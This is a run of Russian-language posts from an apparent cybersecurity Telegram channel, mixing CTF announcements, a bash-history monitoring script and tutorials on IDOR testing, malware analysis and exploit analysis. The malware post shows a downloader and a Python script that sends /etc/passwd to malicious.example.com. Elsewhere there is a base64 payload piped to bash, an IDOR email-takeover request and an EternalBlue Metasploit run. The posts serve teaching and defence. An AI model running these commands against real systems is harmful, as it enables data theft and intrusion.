CodeGuard: CyberSec Edition

❗️Самые «имбовые» каналы в Telegram по мнению пользователей: Hardware Club — здесь вы узнаете, как даже с маленьким бюджетом собрать мощный ПК. Разгон железа, оптимизация системы, новинки, лайфхаки, обзоры, комплектующие, готовые сборки. Windows Club — этот канал удивит даже уверенного пользователя Windows. Бесплатные ключи активации, полезные софты, сервисы, фишки и нейросети. Linux Club — это мечта для пользователей Linux. Здесь вы найдёте всё, от полезных команд в терминале, до обучающих уроков, которые пригодятся даже профи. Apple Club — все фишки, лайфхаки, функции и свежайшие новости для iOS и macOS, собранные в одном канале. ⚡️Даже Стив Джобс бы подписался на эти каналы, пользуйтесь

🔥 CTF от CodeGuard стартует прямо сейчас! 🔥 📅 Даты проведения: Сейчас до 21.09 20:00 (МСК) Сейчас открыт уровень EASY — самый входной и базовый, чтобы проверить свои навыки и войти в атмосферу соревнования. 🎯Что делать? http://158.160.169.61/ — исследуйте и ищите подсказки для получения доступа. Ваша цель: найти три флага в категории EASY: - User - Admin - Root ⚡️Используйте все доступные знания и инструменты, чтобы собрать все флаги. 🌡 Как найдешь все три флага, что бы забрать приз, отправляй письмо на — CodeGuard@bk.ru

Формат письма: Никнейм TG: @ваш_ник Уровень: Easy/Medium/Hard Флаг 1: TFC{...} Флаг 2: TFC{...} Флаг 3: TFC{...}

Ты помнишь, отправляя ответ на уровень EASY, ты не сможешь победить в других категориях(но сможешь поучаствовать) ⏳ Остальные уровни (MEDIUM и HARD) откроются сегодня в течении дня(всевышние силы помогите нам) — тогда же мы поделимся дополнительной информацией тут. 🚫 Важное: инструкцию доступна здесь 🏆 Призы ждут самых быстрых и ловких! Вопросы — в чат CodeGuard. Удачи, пентестеры! Вперед к победе! 😈 CodeGuard | #CTF_CodeGuard

🖥 Скрипты для анализа истории команд пользователей и выявления подозрительной активности История команды Bash — это простой и мощный источник информации о действиях пользователей на сервере. Автоматизация анализа истории команд помогает быстро выявлять подозрительную активность и реагировать на инциденты.

Почему это важно? - Отслеживайте использование `sudo`, запуск удалённых подключений через `ssh` - Контролируйте загрузку файлов с помощью `wget`, `curl` - Находите нестандартные сетевые активности через `nc` или похожие команды

⭐️ Как добавить время к истории команд? В файле ~/.bashrc добавьте:

export HISTTIMEFORMAT="%F %T "

Это позволит видеть точное время выполнения команд. ⭐️ Только пример простого скрипта для поиска подозрительных команд у всех пользователей:

#!/bin/bash

LOGFILE="/var/log/user_command_analysis.log"
PATTERNS="sudo|ssh|wget|curl|nc"

> $LOGFILE

for user_dir in /home/*; do
    user=$(basename "$user_dir")
    hist_file="$user_dir/.bash_history"

    if [ -f "$hist_file" ]; then
        echo "Анализ истории пользователя $user" >> "$LOGFILE"
        grep -E "$PATTERNS" "$hist_file" >> "$LOGFILE"
        echo "-------------------------" >> "$LOGFILE"
    fi
done

echo "Анализ истории команд завершён. Результаты в $LOGFILE"

⭐️ Что дальше? - Настроить скрипт на регулярный запуск в cron для мониторинга - Добавить отправку отчёта на email - Расширять список ключевых паттернов для поиска нужных событий Такой подход даст быстрый и понятный контроль за действиями пользователей и повысит безопасность ваших систем. Как тебе видос к посту?ставь реакцию) ❤️ - да пойдет, прикольное 👍 - да какая-то детская кринжатина, мы хакеры нам надо черный и нагнетающий видос! 😈 CodeGuard | #bash #sysadmin #bashscript #history #security

🔥CTF-соревнование в формате Jeopardy! 🔥

🔥 Внимание! 📅 Даты проведения: 20.09 с 11:00 до 21.09 20:00 (МСК) Ребята, завтра в 11.00 стартует CTF от CodeGuard, ура!

💀 Концепция соревнования Наш CTF - классический формат Jeopardy, разделенный на три уровня сложности: Легкий, Средний и Сложный. В каждой категории предстоит найти 3 флага: User, Admin и Root. Задачи охватывают направления: Веб, Криптография, Стеганография, Реверс-инжиниринг, Форензика и др. ➡️ Структура соревнования - Однопоточный формат — все категории доступны сразу. - Легкий уровень — задачи на базовые навыки. - Средний — требует более глубоких знаний. - Сложный — экспертиза в эксплойтинге и анализе.

Инструкция тут! Ознакомитесь заранее. p.s что бы не тратить время завтра в 11:00, а сразу начать выполнение и победить.

🏆 Правила получения призов - Призы — книги, отдельно в каждой категории. (указал в инструкции, что конкретно) - Когда получите/найдете все три флага в одной из категории, отправьте в [CodeGuard@bk.ru] письмо.

Формат письма: Никнейм TG: @ваш_ник Уровень: Easy/Medium/Hard Флаг 1: TFC{...} Флаг 2: TFC{...} Флаг 3: TFC{...}

👀 Запрещено — подавать заявки в несколько категорий одновременно — DDos — ограничен перебор по количеству потоков 🎮 Посмотри инструкцию! Участвуйте, проверяйте свои навыки и побеждайте! Завтра в 11:00 пост и начало! Удачи всем! 😈 CodeGuard | #CTF_CodeGuard

💥 Взлом для начинающих Kali Linux [Часть 2] — сделай следующий шаг в пентесте! Если ты уже понял базу и хочешь освоить самый популярный инструмент пентестеров — Kali Linux, этот курс для тебя. Что внутри: 🚀Пошаговое изучение системы и основных инструментов Kali 🚀 Уверенное владение командами Linux, которые понадобятся не только в Kali, но и в других дистрибутивах 🚀 Практические задания, которые научат реально взламывать (этично, конечно!) Если командная строка кажется пугающей — этот курс сделает её понятной и простой. Курс достойный и полезный — если хочешь пойти дальше базового уровня, чтобы стать настоящим профи, это твой следующий этап. 🥡 Полная Часть 2 в Архиве — последний пост ⭐️ CodeGuard | Chat | #pentest #kali #course

❕ Специалисты протестировали 200+ IT-каналов — эти 4 просто обязательны к подписке: 👩‍💻 Indigo Web — Современный фронтенд и бэкенд без воды, только практика и актуальные тренды 👊 Indigo Hack — Кибербезопасность, этичный хакинг и то, что реально работает в 2025 👩‍💻 Indigo Python — Глубокие разборы, скрытые возможности Python и фишки, о которых не пишут в доках 📔 Indigo Archive — База знаний: лучшие статьи, мануалы и редкие материалы в одном месте Эти 4 канала заменят вам половину подписок - проверено разработчиками!

👩‍💻 Kali Linux — Криминалистические инструменты Сегодня расскажу про инструменты Kali, которые помогают не только взламывать, но и расследовать — идеальны для цифровой криминалистики (DFIR). 👩‍💻 Вот 15 мощных утилит, которые помогут собрать доказательства, проанализировать систему и восстановить данные: — arpwatch — ARTLAS — Autopsy — Bash Scanner — Bless — Bro — TestDisk — Sleuth Kit — chntpw — creddump — regipy — Registry Explorer — Python-dsstore — DFF — RegRipper 🖥 А еще о 15 утилитах я рассказал в канале CodeGuard: Linux ⭐️ CodeGuard | #kali

📝 Как организовать заметки по кибербезопасности с Obsidian https://www.youtube.com/watch?v=TmWwcJKBzqg В этом видео показано, как использовать Obsidian для создания и систематизации заметок, чтобы учиться хакингу и проводить тестирование удобно и эффективно. 📱 Ссылка на YouTube 😈 CodeGuard | #Obsidianт#study #infosec

😳 Что скрыл сайт? Архивные копии в OSINT В арсенале OSINT-специалиста множество блестящих инструментов: VirusTotal для проверки безопасности, SpiderFoot для автоматизации, DNSDumpster для анализа инфраструктуры, Urlscan, Web-check и Pulsedive для всестороннего сканирования. ❗️Но у них всех есть критический недостаток: они показывают сайт только сейчас. Что если ключевая информация — старый адрес, удаленный контакт, измененное описание услуг, прошлые метрики аналитики — исчезла месяц или год назад? Стандартные инструменты оставят вас в неведении. Для подлинного понимания эволюции веб-ресурса нам нужна машина времени. И она существует – это Wayback Machine от Internet Archive и его мощный, но часто недооцененный CDX API. В отличие от поверхностного просмотра через веб-интерфейс, CDX API предоставляет программный доступ к индексу всех сохраненных копий (снимков) сайта в архиве.

Это позволяет: 1. Получать полный список снимков. Все даты и версии страниц, CSS, JS, изображений. 2. Фильтровать по времени. Изучать сайт в конкретный год, месяц или даже день. 3. Анализировать изменения. Сравнивать содержимое, заголовки, метатеги, скрипты между разными эпохами.

✨ Читать дальше 😈 CodeGuard | #osint

⚡️ RECURA — один из лучших каналов для разработчиков и программистов. Канал ведёт практикующий DevOps-инженер, который ежедневно публикует: 🔹код, повышающий эффективность разработки 🔹лайфхаки и полезные трюки для Bash и Linux 🔹готовые решения для Docker и Kubernetes 🔹инструменты и утилиты для автоматизации 🔹полезные материалы и советы по информационной безопасности ⚠️ Подпишись, чтобы быть востребованным специалистом.

🆒 CodeGuard — это не просто один канал, а целая сеть полезных проектов для вас! Актуальные ресурсы ниже:

PySec Edition Материалы по кибербезу. Linux Не для всех, но именно для тебя. SciencePop Научно-популярный журнал для инженеров и разработчиков Vacancy IT Вакансии, фриланс и топовые подборки Chat CodeGuard Сообщество единомышленников, пообщаться и спросить. Archive Шпоры, книги и материалы для обучения. @N3tHunterLab Ламповый канал про ИБ и все что с ним связано.

Спасибо, что вы здесь — вместе мы сильнее!

🔍 Как найти и использовать уязвимость в публичном API Публичные API — это интерфейсы, через которые приложения общаются друг с другом. Иногда в них бывают ошибки, которые позволяют злоумышленникам получить доступ к данным или изменить их. Расскажу, как проверить API и найти такие уязвимости. ⚙️ Шаг 1. Узнаём, как работает API API — это набор адресов (endpoint), куда отправляются запросы. Например:

https://api.example.com/users/123

где 123 — это ID пользователя. Используем программу Postman или просто команду curl, чтобы посмотреть, что вернёт сервер:

curl https://api.example.com/users/123 -H "Authorization: Bearer токен_доступа"

Если нет токена, попробуй запросить без него — иногда API плохо проверяет права. ➡️ Шаг 2. Проверяем уязвимость — можно ли получить чужие данные? Попробуй подставить другой ID пользователя:

curl https://api.example.com/users/124 -H "Authorization: Bearer твой_токен"

Если API вернёт данные пользователя 124, хотя ты должен видеть только свои, значит тут уязвимость — её называют IDOR (Insecure Direct Object Reference). ➡️Шаг 3. Что можно сделать, если уязвимость есть? Можно читать чужие данные, а иногда — менять их. Например, изменить email:

curl -X PUT https://api.example.com/users/124 \
     -H "Authorization: Bearer твой_токен" \
     -H "Content-Type: application/json" \
     -d '{"email":"hacker@example.com"}'

Если это сработало — значит API не проверяет права правильно, и это опасно. ➡️Шаг 4. Немного автоматизации с Python Можно быстро проверить, доступен ли чужой аккаунт, заменяя ID:

import requests

url = "https://api.example.com/users/"
token = "твой_токен"
headers = {"Authorization": f"Bearer {token}"}

for user_id in range(120, 130):
    r = requests.get(url + str(user_id), headers=headers)
    if r.status_code == 200:
        print(f"Данные пользователя {user_id} доступны!")

Главное: Проверяй только то, что разрешено, иначе это незаконно. 😈 CodeGuard | #API #pentest #curl #python #vulnerability

⚠️ [Перевод] SSL-сертификаты в 2025: самый прибыльный развод в истории интернета $199 за файл. Не за программу. Не за базу данных. Даже не за документ с полезной информацией. За файл в несколько килобайт зашифрованного текста, который говорит браузеру «этот сайт действительно тот, за кого себя выдает». В 2005 году именно столько стоил SSL‑сертификат от VeriSign. Каждый год. За каждый домен. Без исключений. Сегодня точно такую же безопасность, идентичное шифрование, то же доверие браузеров, ту же защиту — можно получить бесплатно. Установить за 30 секунд, так еще и продлевать автоматически. Но вот, в чем мем: хостинг‑компании до сих пор берут $50, $100, а то и $200 за «премиальные» SSL‑сертификаты, которые работают абсолютно так же, как бесплатные. Как целая индустрия продолжает драть деньги за то, что стало товаром широкого потребления и полностью автоматизировано?

Добро пожаловать в историю самого прибыльного развода в истории интернета. Развода настолько элегантного, так хорошо прорекламированного и так глубоко укоренившегося в хостинг‑индустрии, что он продолжает печатать деньги даже после того, как все знают, что это развод.

➡️ Продолжение тут 😈 CodeGuard | #cybersecurity

💻OWASP Juice Shop — идеальная площадка для практики пентеста OWASP Juice Shop — это уязвимое веб-приложение, специально созданное для обучения и прокачки навыков безопасности. 🌐 Внутри — целый набор проблем разной сложности, которые нужно найти и успешно использовать для эксплуатации. Так что это не просто учебник, а настоящий вызов! 🔥Это отличный старт, если хотите понять, как искать и использовать уязвимости в веб-приложениях. Можно тренироваться в безопасной среде, участвовать в CTF и проверять свои инструменты.

📌Почему OWASP Juice Shop? - Покрывает все основные уязвимости из списка OWASP Top 10 - Современный стек: Node.js, Express, Angular, что приближает его к реальному вебу - Подходит как новичкам, так и профи для практики и экспериментов - Отслеживание прогресса через баллы — геймификация помогает идти дальше

Изучать веб-безопасность и пентест — попробуй Juice Shop! 😈 CodeGuard | #pentest #infosec #owasp #websecurity #ctf

👨‍💻 Хотите поучаствовать в CTF? Голосуйте! Планируем запустить собственный сервер с CTF-соревнованием — с интересными задачами и реальными призами! Хотите попробовать свои силы, прокачать навыки и посоревноваться с другими? 🔹 Оставьте лайк или коммент ниже, если готовы участвовать. Будет классно, если удастся организовать регулярные турниры с наградами. Готовы? Давайте посмотрим, сколько нас соберётся! Делитесь, чтобы собрать команду друзей! 😈 CodeGuard | #ctf #соревнования

🔥 Деконструкция вредоносного ПО: что скрывается за базовыми скриптами Многие думают, что «вредоносное ПО — это что-то сложное». На самом деле, масса атакующих скриптов написаны на Bash или Python и выглядят просто(имхо). Но за простотой скрывается продуманная логика и опасные техники. Разберём базовые примеры. 👩‍💻 1. Вредоносный Bash-скрипт: распространение и запуск команд Пример простого скрипта, который скачивает и запускает вредоносный файл:

#!/bin/bash
# Скачиваем вредоносный файл и запускаем
curl -s http://malicious.example.com/malware.sh -o /tmp/malware.sh
chmod +x /tmp/malware.sh
/tmp/malware.sh &

-- Используется curl для загрузки файла с C&C сервера — Запуск выполняется в фоне — скрытно для пользователя — Вредоносный payload может быть любым — удалённое выполнение команд, майнинг, шпионаж 👩‍💻 2. Python-скрипт для сбора и отправки данных Пример кода на Python, который читает локальный файл с паролями и отправляет на удалённый сервер:

import requests

def steal_data():
    with open('/etc/passwd', 'r') as file:
        data = file.read()
    url = 'http://malicious.example.com/collect'
    requests.post(url, data={'content': data})

if __name__ == "__main__":
    steal_data()

- Используется модуль requests для HTTP-запроса - Чтение системного файла /etc/passwd — могут быть и конфиги, и ключи - Все данные отправляются на фишинговый или контролируемый сервер 🤔 3. Техники маскировки и обхода - Скрипты часто запускаются из cron или через systemd для постоянства - Логи и консольный вывод отключают или направляют в /dev/null - Используются переменные среды и шифрование для сокрытия URL и команд 📖 4. Как анализировать такие скрипты — Покомандно и построчно читать код — понимать что делает каждая строка — Использовать bash -x script.sh или добавлять print() в Python для отладки — Запускать в песочнице (VM) под контролем системы мониторинга — Перехватывать сетевой трафик с помощью tcpdump или Wireshark 👩‍💻 5. Мини-скрипт для распаковки закодированных строк в Bash Иногда payload шифруют base64:

echo "Y3VybCAtcyBodHRwOi8vbWFsaWNpb3VzLmV4YW1wbGUuY29tL21hbHdhcmUuc2g=" | base64 -d | bash

Для анализа достаточно выполнить декодировку:

echo "строка_в_base64" | base64 -d

👩‍💻 6. Пример Python скрипта для запуска шелл-команд и сбора вывода

import subprocess

cmd = "uname -a"
result = subprocess.run(cmd, shell=True, stdout=subprocess.PIPE)
print(result.stdout.decode())

Эта техника часто используется для сбора информации о системе. Простые на вид скрипты — это часто высокоэффективные инструменты атак. Важно уметь их читать, распаковывать и анализировать логику. Постоянная практика и инструменты помогут выявлять угрозы. ⭐️ CodeGuard | #malware #bash #python #pentest #reverseengineering

🌃 Инструментарий: GoSearch — поиск по нику на 300+ сайтах Ищешь быстрый и удобный способ найти аккаунты человека или проверить компрометации? Тогда GoSearch — топовый выбор! 🚀 Работает значительно быстрее аналогов типа Sherlock благодаря многопоточности. ⚙️ Главное: умеет проверять утечки через API HudsonRock, ProxyNova и BreachDirectory — это значит, что вы получите не только файндинг аккаунтов, но и инфу о возможных утечках данных. 📱Репозиторий на GitHub: https://github.com/ibnaleem/gosearch Ставь 👍, если хочешь больше топовых инструментов для быстрого и эффективного сбора инфы! 😈 CodeGuard | #osint #pentesting

🌍 Дашборды для OSINT и глобального мониторинга Если нравится наблюдать за изменениями в мире в масштабах континентов и стран, эта подборка дашбордов для вас. Отличный источник данных и вдохновения для OSINT-аналитиков! 1. Shadowserver dashboard Команда Shadowserver отслеживает DDoS, ботнеты, сканирование портов и CVE-уязвимости. Ежедневно обновляемая статистика на интуитивных картах. 2. Shodan internet exposure dashboard Открытые базы, АСУ ТП, торчащие наружу порты с разбивкой по регионам. 3. Global ransomware attacks Карта по атакам программ-вымогателей с 2018 года: сектора экономики, типы программ и суммы выкупа. 4. cybermap.kaspersky Красочный глобус от Лаборатории Касперского с актуальной статистикой угроз. 5. Live Threat Map Сводка кибератак за последний час, сутки и месяц, с топами по странам и типам атак. 6. Talos reputation center Комплексная панель киберугроз от Cisco Talos. 7. Cyber Attack Map Топ серверов-распространителей спама и вредоносного ПО. 8. Sicherheitstacho Сервис от Deutsche Telekom на базе опенсорс ханипотов T-Pot. 9. Cyber map от HTTPCS Агрегация угроз по странам, с расширенной статистикой (требуется регистрация). Эти дашборды не только красивы, но и позволяют быть в курсе динамики киберугроз в мире. 😈 CodeGuard | #osint #cybersecurity #threatmonitoring

🔥 Как читать и анализировать эксплоиты к уязвимостям: первые шаги Эксплоит — это код, который использует баг в программе для получения несанкционированного доступа или другой атаки. Чтобы понять и изучить эксплоиты, важно пошагово подходить к их анализу. ✅1. Изучи уязвимость и её описание (CVE и контекст) Перед организацией анализа скачай описание уязвимости: на сайте [Exploit-DB], [NVD] или в Metasploit. Пойми, как устроена ошибка и где она появляется. ✅2. Зацени код эксплоита Обычно он написан на Python, Bash, Ruby, C или PowerShell. Раздели код на части: - Подготовка окружения - Точки входа (например, функция, куда подаются данные) - Основной функционал атаки — какая команда выполняется, что изменяется. ✅3. Запусти безопасную тестовую среду - Используй виртуальную машину (VirtualBox, VMware) - Установи уязвимую версию софта - Отключи сеть (по необходимости) или используи изолированную сеть ✅4. Проверь зависимости и права Если эксплоит использует внешние библиотеки или команды, убедись, что всё установлено (или установи):

pip install -r requirements.txt

или

sudo apt-get install <пакет>

✅5. Запусти эксплоит с ключами отладки Добавляй команды вывода для отслеживания: - Для Bash: поставь set -x в начале скрипта - Для Python добавь print() для важных переменных - И запускай из терминала:

python3 exploit.py --target 192.168.0.10

✅6. Анализируй сетевой трафик Во время запуска эксплоита захватывай трафик с помощью tcpdump или наблюдай через Wireshark:

sudo tcpdump -i eth0 -w exploit_traffic.pcap
wireshark exploit_traffic.pcap

✅7. Мини-пример на Python для теста уязвимости (Buffer Overflow)

import socket

target_ip = "192.168.0.10"
target_port = 9999

payload = b"A" * 1024  # заполняем буфер для взлома

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target_ip, target_port))
s.send(payload)
print("Payload отправлен!")
s.close()

Этот скрипт посылает 1024 символа ‘A’ на указанный порт — простой тест на переполнение буфера или отслеживание реакции сервера. ✅ 8. Используй Exploit-DB и Metasploit - Для поиска эксплоитов:

searchsploit <название_уязвимости>

- Запуск Metasploit:

msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOST 192.168.0.10
run

⚠️ Важное: обязательно анализируй эксплоиты в изолированной и контрольной среде во избежание вреда. Эти навыки — основа в тестировании безопасности. тебе еще весело? или слишком много надо понимать? желание быть хакером пропадает?)) а это только первые шаги...) ⭐️ CodeGuard | #pentest #exploit #bugbounty #cve